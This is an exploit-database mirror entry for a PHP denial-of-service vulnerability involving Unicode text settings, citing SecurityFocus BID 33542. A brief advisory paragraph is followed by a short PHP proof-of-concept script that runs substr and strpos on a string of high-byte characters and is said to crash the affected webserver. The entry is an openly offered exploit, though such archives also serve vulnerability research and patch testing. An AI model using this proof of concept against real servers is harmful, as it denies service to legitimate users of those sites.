exploit-db-mirror/platforms/php/remote/32769.php
Offensive Security 34d65d4ca3 Updated 04_11_2014
2014-04-11 04:33:25 +00:00

10 lines
No EOL
403 B
PHP
Executable file

source: http://www.securityfocus.com/bid/33542/info
PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.
Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.
<?php
$v = 'Òîâà å òåñò|test.php';
print substr($v,0,strpos($v,'|'));
?>